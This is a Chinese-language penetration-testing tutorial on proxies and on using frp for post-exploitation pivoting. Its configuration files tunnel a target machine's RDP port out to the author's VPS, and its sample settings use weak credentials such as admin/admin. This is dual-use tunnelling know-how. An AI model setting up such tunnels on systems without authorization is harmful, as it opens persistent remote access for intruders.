0x01 描述
內網通常指的是內部局域網,我們想遠程互聯網發起請求時一般是無法直接從本地訪問至目標內網的,這時候就需要我們內網穿透技術來實現對目標內網的訪問啦!
0x02 什么是正向代理
正向代理指的就是我們平常使用的代理服務器。假設我們是A服務器,代理服務器是B,目標服務器為C,A服務器無法直接訪問C服務器,B服務器可以訪問C服務器,A服務器將訪問C服務器的請求發送給B服務器,B服務器訪問之后將它的訪問結果傳輸至A服務器,這就是整個正向代理的過程
舉個栗子:我們國內無法直接訪問Google,但是我們有一台我們可以訪問到並且也可以訪問Google的中間服務器,這時候我們將請求Google的流量發送到這台中間服務器上,Google對請求做處理之后將流量返回給中間服務器,中間服務器再將結果返回給我們。
0x03 什么是反向代理
相對於客戶端來說反向代理隱藏了請求服務器的真實地址。假設存在客戶端A,代理服務器是B,項目真正運行的服務器C,這時候我們將C上面運行的業務通過反向代理的方式代理到了B服務器上,A訪問B服務器時流量會自動轉發至C服務器,對於A服務器來說不需要知道C服務器的地址,直接訪問B服務器即可。
0x04 通過frp實現內網穿透(反向代理)
Git項目地址
https://github.com/fatedier/frp/
1.服務器端
服務器端放置在我們VPS上,相關端口需要具備訪問權限
1.1 配置服務器frps.ini
[common]
bind_port = 7000
dashboard_port = 7500
token = 12345678
dashboard_user = admin
dashboard_pwd = admin
- [common] 必須具備
- bind_port 表示⽤於客戶端和服務端連接的端⼝。
- dashboard_port 是服務端儀表板的端⼝,在配置完成服務啟動后可以通過瀏覽器訪問x.x.x.x:7500 (其中x.x.x.x為VPS的IP)查看frp服務運⾏信息。
- token 是⽤於客戶端和服務端連接的⼝令,客戶端需具備相同token才可以進行連接,具體token內容用戶自定義即可。
- dashboard_user 和dashboard_pwd 表示打開儀表板⻚⾯登錄的⽤戶名和密碼,⾃⾏設置即可。
1.2 啟動代理服務器
./frps -c frps.ini
出現以上內容為啟動成功,因為配置了dashboard_port,我們可以訪問frps中dashboard_port指定的端口查看frp運行狀態(如果不需dashboard可以將frps.ini中的相關參數刪除)
2.客戶端
客戶端放置在目標上
2.1 配置客戶端frpc.ini
[common]
server_addr = x.x.x.x
server_port = 7000
token = 12345678
[rdp]
type = tcp
local_ip = 127.0.0.1
local_port = 3389
remote_port = 7001
- [common] 必須具備,標識了連接frps端的所需要配置
- server_addr為frps服務器地址
- server_port為frps.ini文件中bind_port端口,需要確保frpc可訪問frps.ini中bind_port端口
- token為frps.ini中token,可以為任意字符串,但是需要保持一致,主要是為了保證設置frps和frpc是同一用戶,防止別人非法使用
- [rdp] 名字隨意,可以同時配置多個端口進行轉發
- type 協議類型,支持tcp、udp、http、https和stcp協議
- local_ip 相對於客戶端來說的IP地址,這里的127.0.0.1就相當於客戶端本機
- local_port local_ip的端口
- remote_port 被轉發到frps中的地址,就是我們實際要訪問的地址
2.2 啟動代理服務器
frpc.exe -c frpc.ini
出現successs表示frp建立成功,如果失敗了就檢查一下配置文件是配置出現問題(如果先配置在上傳,並且上傳過程中存在中文路徑可能會在傳輸過程中產生格式錯亂問題),其次檢查一下frpc端是否可以ping通frps端,frps端bind_port端口是否對外開放
3 使用
可以看到我們將本地的3389端口通過frp對接到了代理服務器的7001端口,我們可以直接使用windows自帶的遠程連接工具對frps的7001端口進行連接
輸入賬號密碼連接成功
0x05 總結
內網穿透是后滲透必備的一部分,如何正確熟練的進行內網穿透是后滲透工作開展的基礎,如果發現文章內容存在問題,請及時聯系,共同學習進步。